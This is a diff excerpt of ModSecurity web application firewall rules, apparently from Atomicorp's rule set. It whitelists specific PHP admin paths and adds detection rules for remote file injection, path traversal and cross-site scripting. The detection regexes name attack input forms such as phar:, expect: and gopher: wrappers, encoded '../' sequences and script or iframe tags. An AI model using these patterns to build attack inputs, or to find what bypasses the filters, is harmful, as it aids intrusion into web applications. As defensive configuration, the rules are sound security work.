+SecRule REQUEST_URI|ARGS|!ARGS:IDEAL_EMAIL "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"           "phase:2,deny,log,auditlog,status:403,id:390730,t:none,t:urlDecodeUni,t:htmlEntityDecode,multimatch,capture,chain,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecMarker END_RULES_91646
+
+SecRule REQUEST_FILENAME "/admin/listing_editresult\.php" "phase:2,id:91647,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin/items_price_result\.php" "phase:2,id:91648,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin/configure_homepage\.php" "phase:2,id:91649,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/newreply\.php" "phase:2,id:91650,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390621"
+
+SecRule REQUEST_FILENAME "/editpost\.php" "phase:2,id:91651,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390621,ctl:ruleRemovebyID=380020"
+
+SecRule REQUEST_FILENAME "/admin/file_manager\.php" "phase:2,id:91652,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340855"
+
+SecRule REQUEST_FILENAME "/includes/conteudosactions\.php" "phase:2,id:91653,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/webim/button\.php" "phase:2,id:91654,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340161"
+
+SecRule REQUEST_FILENAME "/includes/multimediaactions\.php" "phase:2,id:91655,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006"
+
+SecRule REQUEST_FILENAME "/includes/lojaactions\.php" "phase:2,id:91656,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390703"
+
+SecRule REQUEST_FILENAME "/config/index\.php" "phase:2,id:91657,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340007"
+SecAction "phase:2,id:91658,t:none,pass,nolog,skipAfter:END_RULES_91658"
+
+SecRule REQUEST_URI|ARGS|!ARGS:/CACHE_PATH/|!ARGS:SQLiteDataDir|!ARGS:/description/|!ARGS:/comment/|!ARGS:obrazek|!ARGS:/txt/|!ARGS:keywords|!ARGS:/wysiwyg/|!ARGS:/ajax/|!ARGS:css_data|!ARGS:/text/|!ARGS:/message/|!ARGS:body|!ARGS:pagecontent|!ARGS:/html/|!ARGS:filecontent|!ARGS:content|!ARGS:filename|!ARGS:fck_body|!ARGS:text|!ARGS:/content/ "(?:\x5c|(?:%(?:c(?:0%(?:9v|af)|1%1c)|2(?:5(?:2f|5c)|f)|u221[56]|1u|5c)|\/))(?:%(?:u2024|2e)|\.){2}(?:\x5c|(?:%(?:c(?:0%(?:9v|af)|1%1c)|2(?:5(?:2f|5c)|f)|u221[56]|1u|5c)|\/))"  	"phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,capture,id:390731,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic Path Recursion denied',logdata:'%{TX.0}'"
+
+SecMarker END_RULES_91658
+
+SecRule REQUEST_FILENAME "/modedit\.php" "phase:2,id:91659,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin/categories\.php" "phase:2,id:91660,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/addclass\.php" "phase:2,id:91661,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/medialibrary\.php" "phase:2,id:91662,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390700"
+
+SecRule REQUEST_FILENAME "/meta_admin\.php" "phase:2,id:91663,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"
+
+SecRule REQUEST_FILENAME "/admin/question_edit\.php" "phase:2,id:91664,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin/processors/directory_addedit\.php" "phase:2,id:91665,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=380006"
+
+SecRule REQUEST_FILENAME "/wp-admin/widgets\.php" "phase:2,id:91666,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=380006"
+
+SecRule REQUEST_FILENAME "/admin/aprod\.php" "phase:2,id:91667,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=380006"
+
+SecRule REQUEST_FILENAME "/admin/ritem\.php" "phase:2,id:91668,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=380006"
+
+SecRule REQUEST_FILENAME "/affiliate/scripts/server\.php" "phase:2,id:91669,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/sifr\.swf" "phase:2,id:91670,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin/smalladmin/index\.php" "phase:2,id:91671,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340016"
+
+SecRule REQUEST_FILENAME "/content_manager\.php" "phase:2,id:91672,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/account/loginpost/" "phase:2,id:91673,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+SecAction "phase:2,id:91674,t:none,pass,nolog,skipAfter:END_RULES_91674"
+
+SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:video_credits|!ARGS:move2|!ARGS:hoperation|!ARGS:/custom_code/|!ARGS:arg2|!ARGS:send|!ARGS:resumoDetalhe|!ARGS:bbcode_tpl|!ARGS:Right_photo_1|!ARGS:embedVideo|!ARGS:/^K2ExtraField/|!ARGS:mentorhelp|!ARGS:/submitcode/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:/^fck/|!ARGS:parent_name|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:categories_title|!ARGS:antwoord|!ARGS:project_company|!ARGS:signature|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:/VB_announce/|!ARGS:guardar|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:ticket_response|!ARGS:/element/|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:c_features|!ARGS:/tekst/|!ARGS:embeddump|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions|!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^elm/|!ARGS:verbiage|!ARGS:news|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:order|!ARGS:/post/|!ARGS:youtube|!ARGS:reply|!ARGS:business|!ARGS:/homePage/|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:Post|!ARGS:/^field_id/|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:/desc/|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/ "(< ?(?:(?:java|vb)?script|about|applet|activex|chrome) ?>|> ?< ?(img ?src|a ?href) ?= ?(ht|f)tps?:/|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?(>|<)|< ?/?i?frame|\%env)"          "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:replaceNulls,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,capture,id:370147,rev:87,severity:2,msg:'Atomicorp.com WAF Rules: Generic XSS filter',logdata:'%{TX.0}'"
+SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:video_credits|!ARGS:move2|!ARGS:hoperation|!ARGS:arg2|!ARGS:resumoDetalhe|!ARGS:send|!ARGS:Right_photo_1|!ARGS:/^K2ExtraField/|!ARGS:bbcode_tpl|!ARGS:embedVideo|!ARGS:/submitcode/|!ARGS:mentorhelp|!ARGS:/custom_code/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:parent_name|!ARGS:/^fck/|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:categories_title|!ARGS:antwoord|!ARGS:project_company|!ARGS:signature|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:guardar|!ARGS:/VB_announce/|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:embeddump|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:query|!ARGS:/sql/|!ARGS:prefix|!ARGS:c_features|!ARGS:/tekst/|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:verbiage|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:preview__hidden|!ARGS:order|!ARGS:youtube|!ARGS:/post/|!ARGS:reply|!ARGS:business|!ARGS:navig|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:/page/|!ARGS:/homePage/|!ARGS:Post|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:/desc/|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:googlemap|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(?:< ?(?:(?:img|i?frame) ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|zlib|(ht|f)tps?)\:/|alert ?\(|<? (?:(?:java|vb)?script|applet|activex|chrome) ?>|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?>|< ?/?i?frame|\%env)"           "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:replaceNulls,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,multimatch,capture,id:370148,rev:95,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack',logdata:'%{TX.0}'"
+
+SecMarker END_RULES_91674
+
+SecRule REQUEST_FILENAME "/admin/package_edit\.php" "phase:2,id:91675,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/cgi-bin/setup\.cgi" "phase:2,id:91676,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/pncrtl/template\.php" "phase:2,id:91677,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007"
+
+SecRule REQUEST_FILENAME "/novedades_abm\.php" "phase:2,id:91678,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/cgi-bin/pmanage/pmanage\.cgi" "phase:2,id:91679,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/sage/download\.php" "phase:2,id:91680,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/versioncheck\.php" "phase:2,id:91681,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=330700"
+
+SecRule REQUEST_FILENAME "/kameleon\.php" "phase:2,id:91682,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340026"
+SecAction "phase:2,id:91683,t:none,pass,nolog,skipAfter:END_RULES_91683"
+
+
+#SecRule ARGS "!@pmFromFile trusted-domains.txt" chain
+SecRule REQUEST_URI|ARGS|!ARGS:static|!ARGS:/url/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,capture,id:370149,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule REQUEST_URI|ARGS|!ARGS:static|!ARGS:/url/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,id:370150,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,capture,chain,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91683
+
+SecRule REQUEST_FILENAME "/click\.php" "phase:2,id:91684,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340026"
+SecAction "phase:2,id:91685,t:none,pass,nolog,skipAfter:END_RULES_91685"
+
+SecRule REQUEST_URI|ARGS|!ARGS:/url/|!ARGS:to|!ARGS:from|!ARGS:lnk|!ARGS:to|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:c "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,capture,id:370151,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule REQUEST_URI|ARGS|!ARGS:/url/|!ARGS:to|!ARGS:from|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:c "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,id:370152,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,capture,chain,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecMarker END_RULES_91685
+
+SecRule REQUEST_FILENAME "/admin/cruise_co_process\.php" "phase:2,id:91686,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340152"
+
+SecRule REQUEST_FILENAME "/supportcenter/" "phase:2,id:91687,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340152"
+
+SecRule REQUEST_FILENAME "/sendmail\.php" "phase:2,id:91688,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"
+
+SecRule REQUEST_FILENAME "/files_code\.php" "phase:2,id:91689,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91690,t:none,pass,nolog,skipAfter:END_RULES_91690"
+
+SecRule REQUEST_URI|ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/hidden/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,capture,id:370153,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule REQUEST_URI|ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/hidden/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,id:370154,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,capture,chain,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecMarker END_RULES_91690
+
+SecRule REQUEST_FILENAME "/modify\.php" "phase:2,id:91691,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91692,t:none,pass,nolog,skipAfter:END_RULES_91692"
+
+SecRule REQUEST_URI|ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/direct/|!ARGS:/thumb/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,capture,id:370155,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
